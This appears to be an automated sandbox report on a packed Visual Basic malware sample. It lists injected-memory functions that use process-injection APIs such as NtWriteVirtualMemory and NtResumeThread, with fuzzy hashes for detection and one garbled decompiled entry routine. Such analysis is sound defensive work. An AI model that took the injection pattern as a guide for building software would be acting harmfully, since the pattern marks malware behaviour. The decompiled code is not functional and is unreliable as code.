
APIs

NtWriteVirtualMemory.NTDLL(?,4D4B463A,?,00000000,?,BA94FC38,?,BA94FC34,-12BAECBB,BA94FC38), ref: 020F4FAB

Strings

32aG, xrefs: 020F4839
*6;R, xrefs: 020F508D
Mb, xrefs: 020F4691
:FKM, xrefs: 020F4EEB
r-<W, xrefs: 020F4E4D

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: *6;R$32aG$:FKM$Mb$r-<W
API String ID: 3527976591-3219171453
Opcode ID: c1bd2e7e0a848a4fa0cee31d19c122a861971be715c4dc0def1c46499622c3f3
Instruction ID: 0d5f4f5433e10f7581b745e80c4cc91299b13a110ecff212dcde2cfb0884089e
Opcode Fuzzy Hash: c1bd2e7e0a848a4fa0cee31d19c122a861971be715c4dc0def1c46499622c3f3
Instruction Fuzzy Hash: 345221B26443459FDB749F38CC957DABBA2FF58300F51812DDD898B614D370AA86CB82

Uniqueness

Uniqueness Score: -1.00%

Function 020F7EA4, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 661COMMON

Download Yara Rule

Strings

32aG, xrefs: 020F4839
*6;R, xrefs: 020F508D
Mb, xrefs: 020F4691
:FKM, xrefs: 020F4EEB
r-<W, xrefs: 020F4E4D

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: *6;R$32aG$:FKM$Mb$r-<W
API String ID: 0-3219171453
Opcode ID: 426a39f8182698c76a8495965fec0e3f0e306a0a53d8864c5c31449d3b5d5e66
Instruction ID: 1258054f51016494a6ef3238bb92b27e200ffc854fcc3946630f8820f5065b6b
Opcode Fuzzy Hash: 426a39f8182698c76a8495965fec0e3f0e306a0a53d8864c5c31449d3b5d5e66
Instruction Fuzzy Hash: 5E52DDB26043499FDBB99F28CC857EABBA2FF54310F55812DDE899B614C3705A81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 020F43A8, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 615nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,4D4B463A,?,00000000,?,BA94FC38,?,BA94FC34,-12BAECBB,BA94FC38), ref: 020F4FAB

Strings

32aG, xrefs: 020F4839
*6;R, xrefs: 020F508D
Mb, xrefs: 020F4691
:FKM, xrefs: 020F4EEB
r-<W, xrefs: 020F4E4D

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: *6;R$32aG$:FKM$Mb$r-<W
API String ID: 3527976591-3219171453
Opcode ID: c38d3af79132b37bbb987f4556067d2f161fa66b79d971a80a496e3ee584e20c
Instruction ID: 07cd60d1a16d61f64632c0fac557909c6264ecfb757d8411e85079ff8868aef2
Opcode Fuzzy Hash: c38d3af79132b37bbb987f4556067d2f161fa66b79d971a80a496e3ee584e20c
Instruction Fuzzy Hash: D542DBB26043499FDBB89F28CC857DABBA2FF54300F55812DDD899B614C370AA81CF42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0B55, Relevance: 9.5, APIs: 1, Strings: 4, Instructions: 783COMMON

Download Yara Rule

Strings

:|J, xrefs: 020F1295
(O, xrefs: 020F0965
,+Jv, xrefs: 020F13CA
5>\, xrefs: 020F5431

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: ,+Jv$5>\$:|J$(O
API String ID: 2167126740-128048704
Opcode ID: 1b59d4ac76e1db8e58b8c04ffb52829015d58ccdb2c08316ac7849242f27e806
Instruction ID: 1aebf48bde562c1e75ebeba0bfe6f830291b3c8434d7af26aa3328f20542876a
Opcode Fuzzy Hash: 1b59d4ac76e1db8e58b8c04ffb52829015d58ccdb2c08316ac7849242f27e806
Instruction Fuzzy Hash: CD525471A843899FCBB49F28CC947EE7BE2AF44350F45412EDD8D9BA55D7308A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F474F, Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 499nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,4D4B463A,?,00000000,?,BA94FC38,?,BA94FC34,-12BAECBB,BA94FC38), ref: 020F4FAB

Strings

32aG, xrefs: 020F4839
*6;R, xrefs: 020F508D
:FKM, xrefs: 020F4EEB
r-<W, xrefs: 020F4E4D

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: *6;R$32aG$:FKM$r-<W
API String ID: 3527976591-1705079728
Opcode ID: a4ccbb180f5c1cd5baa17483a8110668fe6b89e19160924d04d54115307fc3f5
Instruction ID: a8f2c14693df2ccc84de3c496dbfc6563c86d6d42bb0aeb466539c6736da2524
Opcode Fuzzy Hash: a4ccbb180f5c1cd5baa17483a8110668fe6b89e19160924d04d54115307fc3f5
Instruction Fuzzy Hash: 011236B16403488FDB758F28CC957DE77A2FF98300F55402EDD898B655D770AA8ACB82

Uniqueness

Uniqueness Score: -1.00%

Function 020F0C8E, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 471COMMON

Download Yara Rule

Strings

:|J, xrefs: 020F1295
,+Jv, xrefs: 020F13CA
5>\, xrefs: 020F5431

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ,+Jv$5>\$:|J
API String ID: 0-1017681367
Opcode ID: 2355f5060dae54c06c5258a27a915bbf9e314e4135c2af825251ef77b5817ba2
Instruction ID: 50bd99ee7c30dff7c426124bc17c13cd614e3265c1b6f9cee44600bfa8205d2d
Opcode Fuzzy Hash: 2355f5060dae54c06c5258a27a915bbf9e314e4135c2af825251ef77b5817ba2
Instruction Fuzzy Hash: 6F0246716803899FCBB48E6C8CA57DE77E2AF44710F94412EDD8CCB691D7349A4ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0BD2, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 428COMMON

Download Yara Rule

Strings

:|J, xrefs: 020F1295
,+Jv, xrefs: 020F13CA
5>\, xrefs: 020F5431

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ,+Jv$5>\$:|J
API String ID: 0-1017681367
Opcode ID: 652d2521bec33478e4bdec24f1c546e34faf9402bb2b60661451382b3d399f59
Instruction ID: a5300f7a128a6c7262b1177c4c5de0e5c999ac006f582b6ca38dcdfb0761cbab
Opcode Fuzzy Hash: 652d2521bec33478e4bdec24f1c546e34faf9402bb2b60661451382b3d399f59
Instruction Fuzzy Hash: ED023271A44389DFCBB49F288C94BEE7BE2AF45350F55812EDD8D9BA50D3304A41CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0E55, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 365COMMON

Download Yara Rule

Strings

:|J, xrefs: 020F1295
,+Jv, xrefs: 020F13CA
5>\, xrefs: 020F5431

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ,+Jv$5>\$:|J
API String ID: 0-1017681367
Opcode ID: 670de49c1d266bd5bb420566a1f9d604be38905051834a733a83ea29e9baf6f9
Instruction ID: eb4cd89da774bc953c9d2c0d80c3580ea4c610c2b68c4519a5f1c8931ee52d5c
Opcode Fuzzy Hash: 670de49c1d266bd5bb420566a1f9d604be38905051834a733a83ea29e9baf6f9
Instruction Fuzzy Hash: 5DE16471A40389DFCBB49F788C94BEEBBE2AF45350F45412EDD898BAA1D7305641CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0E7A, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 321COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(3915B537,3DE72F93), ref: 020F544F

Strings

:|J, xrefs: 020F1295
,+Jv, xrefs: 020F13CA
5>\, xrefs: 020F5431

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: ,+Jv$5>\$:|J
API String ID: 560597551-1017681367
Opcode ID: 04723ff318be6c5bdcb9f616d85be520d3ba4fb7a5a9f5351493cffdf11846b0
Instruction ID: 0171dba5db418d1efcbf3e95e5554d515ba662eaf2f57dc3853c55a3c9476094
Opcode Fuzzy Hash: 04723ff318be6c5bdcb9f616d85be520d3ba4fb7a5a9f5351493cffdf11846b0
Instruction Fuzzy Hash: 0ED15371A44389DFCBB49F78CCA5BEEBBA2AF45310F45412EDD899BA91C3304641CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020F4C19, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 313nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,4D4B463A,?,00000000,?,BA94FC38,?,BA94FC34,-12BAECBB,BA94FC38), ref: 020F4FAB

Strings

*6;R, xrefs: 020F508D
:FKM, xrefs: 020F4EEB
r-<W, xrefs: 020F4E4D

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: *6;R$:FKM$r-<W
API String ID: 3527976591-2291305708
Opcode ID: 7c13048f043ee07b9b301fa9309eeefe972d0fe220acf243265abed711c14dda
Instruction ID: 87580a23c78029a45d00b9fd783676c87fa7cbe9317704c575af63d8c5d70aa8
Opcode Fuzzy Hash: 7c13048f043ee07b9b301fa9309eeefe972d0fe220acf243265abed711c14dda
Instruction Fuzzy Hash: C3C1F3717413598FDB758E688CE43CE77A2BB88300F54803EDD4CCB656D770AA4A8B82

Uniqueness

Uniqueness Score: -1.00%

Function 020F10EB, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 276COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(3915B537,3DE72F93), ref: 020F544F

Strings

:|J, xrefs: 020F1295
,+Jv, xrefs: 020F13CA
5>\, xrefs: 020F5431

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: ,+Jv$5>\$:|J
API String ID: 560597551-1017681367
Opcode ID: 90f1b5454f5c72fbb9fc4b272082f12fb19929903051920da9149e052babea6a
Instruction ID: 09218bf1889c0efb5cda36106733a60023dcef23189d37af677bcfadc2e92860
Opcode Fuzzy Hash: 90f1b5454f5c72fbb9fc4b272082f12fb19929903051920da9149e052babea6a
Instruction Fuzzy Hash: 6EA13A702813468FCBB18E7C4CA57DEB7E2AF45710F94412EDD88CB6A2D774964AC683

Uniqueness

Uniqueness Score: -1.00%

Function 020F1070, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 214COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(3915B537,3DE72F93), ref: 020F544F

Strings

:|J, xrefs: 020F1295
,+Jv, xrefs: 020F13CA
5>\, xrefs: 020F5431

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID: ,+Jv$5>\$:|J
API String ID: 560597551-1017681367
Opcode ID: b5a747fb2bfbb355fd9087fbe51e266970dc0c09b1095896092f5ccac66f9107
Instruction ID: 8d11935b713362009937a4c09d9c5c763ee447fcb498cbd2550322a661bc5c2b
Opcode Fuzzy Hash: b5a747fb2bfbb355fd9087fbe51e266970dc0c09b1095896092f5ccac66f9107
Instruction Fuzzy Hash: 70918670584389DFCBB98F388D957EEBBA2AF45314F45422ECD8D8BAA0C7340241CB02

Uniqueness

Uniqueness Score: -1.00%

Function 020F1060, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

:|J, xrefs: 020F1295
,+Jv, xrefs: 020F13CA
5>\, xrefs: 020F5431

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: ,+Jv$5>\$:|J
API String ID: 0-1017681367
Opcode ID: b945aac8cf3bcb792d21d30524b8081aa614b387a6abb51f7c43cc49cf4acdb1
Instruction ID: 286eeab66f5d58964bf888e6f52b99db6e7f9e65d37df874e0063e4a43c73f9e
Opcode Fuzzy Hash: b945aac8cf3bcb792d21d30524b8081aa614b387a6abb51f7c43cc49cf4acdb1
Instruction Fuzzy Hash: 08817670584389DFCBF58F388D957EEBBA2AF41314F45422ECD898BAA0C7344641CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F0567, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

EnumWindows.USER32(020F0614,BB93FB29,00000000), ref: 020F059D

Strings

(O, xrefs: 020F0965

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: EnumWindows
String ID: (O
API String ID: 1129996299-1594844727
Opcode ID: 824d4821da1391edab8d4c6c767a7ebc98c5f9ccbaf85588039dd52eb2dd0ac8
Instruction ID: 9a1ece9748f4698d7107a472e02479ef8ff87e246be247b93a78dc3ad5f2c52c
Opcode Fuzzy Hash: 824d4821da1391edab8d4c6c767a7ebc98c5f9ccbaf85588039dd52eb2dd0ac8
Instruction Fuzzy Hash: CDC10071A443499FCBB0EF38CC997EE7BE2AF58350F45402ADD899B615D3318A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F37D8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 287COMMON

Download Yara Rule

Strings

TXP, xrefs: 020F37FC

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: TXP
API String ID: 0-499584619
Opcode ID: 1d871c876716773f290e3041157147e896ba6f8c46c728bc0fe27375db9d56da
Instruction ID: 0c4501c849877fff780c53d0126b47caf8af95d73a7a82cf6ae661af2b572fd0
Opcode Fuzzy Hash: 1d871c876716773f290e3041157147e896ba6f8c46c728bc0fe27375db9d56da
Instruction Fuzzy Hash: 0CB12F71644348DFDBB5AF74C884BEABBE2EF14360F46405EDD8A9B660C7309981CB52

Uniqueness

Uniqueness Score: -1.00%

Function 020F93EC, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 169nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020F987A

Strings

EA , xrefs: 020F95EF

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID: EA
API String ID: 947044025-2399277265
Opcode ID: c0ce30cd542904bf981e8a4832d7489342078a4110e4cfaf1bd6a5c890d95f96
Instruction ID: 2aab0011d039721e9ae57136d40490161fba8af058a45e9e234216e377ebf827
Opcode Fuzzy Hash: c0ce30cd542904bf981e8a4832d7489342078a4110e4cfaf1bd6a5c890d95f96
Instruction Fuzzy Hash: 19613472640348DFDFBADF38C9A03EA37A2EF95310F56811ACC098BA51C7349A46CB41

Uniqueness

Uniqueness Score: -1.00%

Function 020F8680, Relevance: 3.2, Strings: 2, Instructions: 745COMMON

Download Yara Rule

Strings

haB, xrefs: 020F8923
(O, xrefs: 020F0965

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: haB$(O
API String ID: 2706961497-3413583213
Opcode ID: 7bac2cd4e7b1fc72601eaa7fb6f3aff1c2f6e84aa498b06b2c04236b8099b9a1
Instruction ID: 4b96e4315d23e51275446d034759e50fb72d50ba2c21c7b1d568d194310ee69f
Opcode Fuzzy Hash: 7bac2cd4e7b1fc72601eaa7fb6f3aff1c2f6e84aa498b06b2c04236b8099b9a1
Instruction Fuzzy Hash: 0A6214715483858FDBB1DF38CC987DABBE2AF56310F49816ACD898F696D3348641CB12

Uniqueness

Uniqueness Score: -1.00%

Function 020F93FB, Relevance: 1.9, APIs: 1, Instructions: 352nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 020F987A

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: dae8fa44948922320d5ac18f2368c2e176cff65814b20500da1bc15e53ba2e01
Instruction ID: fba32ca696c171207de274018fbdc24eefd16d843692c9097c26f08bd03f3320
Opcode Fuzzy Hash: dae8fa44948922320d5ac18f2368c2e176cff65814b20500da1bc15e53ba2e01
Instruction Fuzzy Hash: B1C1C7717813158FCB328D6D48F53CD73E2AB98500F94407ADD48CB696EB74E94F8682

Uniqueness

Uniqueness Score: -1.00%

Function 020F2899, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff5e567d02f799ac561c9efe7b6023d0d67b15310a7bd3db5f504b1bb7ad9bdd
Instruction ID: 26c636347cc64dbc57e77735ffb3fe6bf0bbcebbc6c35fef34c96269e0db8b4e
Opcode Fuzzy Hash: ff5e567d02f799ac561c9efe7b6023d0d67b15310a7bd3db5f504b1bb7ad9bdd
Instruction Fuzzy Hash: 44B13172A443989FCBB49F35CC44BEE7BE2AF94310F55442EED89AB610D3309A41CB52

Uniqueness

Uniqueness Score: -1.00%

Function 020F58FA, Relevance: 1.7, APIs: 1, Instructions: 190memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-228365FB,000005C4), ref: 020F5AF4

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 5872cc65e099e5a5aa9732bb34bd025916852d61e8fc5b8fb77ccaf855b4da11
Instruction ID: 0fa4781f87d1aaea22b8dbe6526ab88a52586609ba1e5fd52cf17a9caa03f3ca
Opcode Fuzzy Hash: 5872cc65e099e5a5aa9732bb34bd025916852d61e8fc5b8fb77ccaf855b4da11
Instruction Fuzzy Hash: 7F51A3757913168FCB318D5D4CA53CD73E2AB88610FA4443ADD88CB296D7B4DA4E8683

Uniqueness

Uniqueness Score: -1.00%

Function 020F588C, Relevance: 1.6, APIs: 1, Instructions: 121memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-228365FB,000005C4), ref: 020F5AF4

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 7b7b8672fc1399b562cbeb4ed0c488a6a8be801f73510d9c7c723bcb693f33e5
Instruction ID: 92d101fd7ad91337ee1adc6e86113ca1d1c803824489ad52fd8968df95c8f35f
Opcode Fuzzy Hash: 7b7b8672fc1399b562cbeb4ed0c488a6a8be801f73510d9c7c723bcb693f33e5
Instruction Fuzzy Hash: 3B4100B1644345DFDBB19E68CC897EE7BE6EF4A310F55452EDD899B210D3708A40CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020F56A3, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020F578A

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2f762e1bd03d1d3f89c6d3d01f6c99a94c83b804086fba0b6e130d321891ba0e
Instruction ID: f81a64790a14c8ac7ccb8deb905b357fcb2374ee1e37ede06b0f1599f921d888
Opcode Fuzzy Hash: 2f762e1bd03d1d3f89c6d3d01f6c99a94c83b804086fba0b6e130d321891ba0e
Instruction Fuzzy Hash: 9411E272A243A49FDB608E7489C47EBB7A5FF59300F464859DC99AB200D3711E80CB92

Uniqueness

Uniqueness Score: -1.00%

Function 020F8FC4, Relevance: 1.5, APIs: 1, Instructions: 36nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 020F903C

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: cb6296381e35234b80a258f5348b5ff091ec3bf54b26d424a7c7501b36d95f08
Instruction ID: e3562fca93a34eecb1729bfddfba3cc6cef6ef5f29b0a5850eaf55aa31b71980
Opcode Fuzzy Hash: cb6296381e35234b80a258f5348b5ff091ec3bf54b26d424a7c7501b36d95f08
Instruction Fuzzy Hash: AD01C9B52082489FDB64CE6CDD587EA77EAEFD9300F158429A88DDB305D270A9458B11

Uniqueness

Uniqueness Score: -1.00%

Function 020F6562, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(3CF28AB3), ref: 020F6577

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6605165cff420406c9775f569901bb629ca5d11f894276624a2e2c060353b7a8
Instruction ID: dc93f6f1514c7c05d34023018bf74cd1c40f42e03e79dda3375c4d6403654530
Opcode Fuzzy Hash: 6605165cff420406c9775f569901bb629ca5d11f894276624a2e2c060353b7a8
Instruction Fuzzy Hash: 89B09B731541445FC34552604C6559126D0575125177DD0E5D4440F116C9540D55FFD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401144, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 65%

			_entry_(void* __eax, signed int* __ebx, signed int __ecx, signed int __edx, intOrPtr* __esi) {
				void* _t3;
				signed int _t5;
				signed int _t6;
				signed int _t8;
				signed int _t10;
				intOrPtr* _t15;
				void* _t17;
				void* _t18;
				void* _t21;
				void* _t22;

				_t15 = __esi;
				_t10 = __edx;
				_t8 = __ecx;
				_t3 = __eax;
				_push("VB5!6&*");
				do {
					_t5 = _t3 + 1 + _t8;
					asm("lock invalid");
					 *_t5 =  *_t5 + 1;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t10;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t8 =  *_t8 & _t8;
					asm("lahf");
					asm("adc dl, [ebx-0x56bdaed4]");
					asm("adc al, [ds:edi-0x1]");
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t5 =  *_t5 + _t5;
					 *_t15 =  *_t15 + _t5;
					_push(_t5);
					 *_t8 =  *_t8 + 0x53;
					_push(_t17);
					_t15 = _t15 - 1 + 1;
					_t18 = _t17 + 1;
					_push(_t18);
					_t22 = _t21 + 1;
					_t8 = _t8 - 1 + 1;
					 *_t5 =  *_t5 + _t8;
					_t6 = _t5 |  *__ebx;
					 *_t6 =  *_t6 + _t6;
					 *_t6 =  *_t6 + _t6;
					_t21 = _t22 - 1;
					 *_t6 =  *_t6 ^ _t6;
					es = _t22;
					_push(_t8);
					_t3 = _t10 +  *((intOrPtr*)(__ebx - 7)) + 2;
					_t10 = _t6;
					_t17 = _t18 + 1 + _t21 + 1;
					asm("fiadd dword [ecx-0x78]");
				} while (_t17 != 0);
				asm("arpl [esi-0x5d], bx");
				asm("daa");
				asm("adc al, 0x7");
				ds = 0x5f;
				asm("enter 0x7288, 0x4d");
				asm("stosb");
				return _t3;
			}

0x00401144
0x00401144
0x00401144
0x00401144
0x00401144
0x00401147
0x00401148
0x0040114a
0x0040114d
0x0040114f
0x00401151
0x00401153
0x00401155
0x00401157
0x0040115a
0x0040115c
0x0040115e
0x00401160
0x00401162
0x00401163
0x00401169
0x00401170
0x00401172
0x00401174
0x00401176
0x00401178
0x0040117b
0x0040117d
0x0040117e
0x00401181
0x00401185
0x00401186
0x00401187
0x00401188
0x00401189
0x0040118c
0x0040118e
0x00401190
0x00401192
0x00401194
0x00401196
0x00401198
0x0040119a
0x0040119b
0x0040119b
0x0040119e
0x0040119f
0x0040119f
0x004011a4
0x004011a7
0x004011aa
0x004011ac
0x004011ad
0x004011b1
0x004011b2

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401149

Strings

VB5!6&*, xrefs: 00401144

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: d7bcc81d966155dbd390ad17853493ca08cefffc5029d04fcfe3ee72d0e81c06
Instruction ID: 8b485ed7109c182642eefb2dac06b995e34b3465d26102f83ae08db25948a38a
Opcode Fuzzy Hash: d7bcc81d966155dbd390ad17853493ca08cefffc5029d04fcfe3ee72d0e81c06
Instruction Fuzzy Hash: EB11C2A044E3D16FD7474B748C265A57F749E4322470A01DBD6C2DE4B3C26D484B8B73

Uniqueness

Uniqueness Score: -1.00%

Function 020F243F, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 6f9efa5bb8242f12455b6a98d3f635ce931bdd23040b878e62ceecca42da58b2
Instruction ID: 7b3a9095f557019fd6854601eef7af451eb8d32ae5991f7a24aa11edd85e777d
Opcode Fuzzy Hash: 6f9efa5bb8242f12455b6a98d3f635ce931bdd23040b878e62ceecca42da58b2
Instruction Fuzzy Hash: 1F3147719807989FDBB5AF748C00BEE7BE7AF51320F54401ADE095BA10DB705A429F62

Uniqueness

Uniqueness Score: -1.00%

Function 020F7438, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D90E6CFB), ref: 020F74DE

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7a11668772972a9d11f4a955a0be41544fcaf7eb9063ae780f5f3e1e0165f915
Instruction ID: fbd30e5aa361cf1bed5c75dfc6e4dd201021a9aee7781537d1ecc2cc7e7e45f1
Opcode Fuzzy Hash: 7a11668772972a9d11f4a955a0be41544fcaf7eb9063ae780f5f3e1e0165f915
Instruction Fuzzy Hash: 7501F776D80BA89BDBB17FB58840BEDBAD6AF11330F108006DE186BA20C77559419F93

Uniqueness

Uniqueness Score: -1.00%

Function 020F736F, Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(D90E6CFB), ref: 020F74DE

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 60b9ed7429e3deb21e4eeee7186364a4e2463cf12a18cbbdc2b725163a85fccf
Instruction ID: 2479ba8dd66306909831c1054bcbd35e0ca2c5dc2777c0e8587238d0fa2c8fd2
Opcode Fuzzy Hash: 60b9ed7429e3deb21e4eeee7186364a4e2463cf12a18cbbdc2b725163a85fccf
Instruction Fuzzy Hash: 1EF03A755047989BCF78DF218C08BEE7BABEF98310F544119DC499B610DB705A42CB26

Uniqueness

Uniqueness Score: -1.00%

Function 020F57B7, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020F578A

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c63098b74f522311e15a6d2d05c7adb2c1a268459ecf32030be2b505bb356bdb
Instruction ID: 9689040a1b49b8a3a353acc23b38d73664a9ad852a0f8b0250146ee449db2212
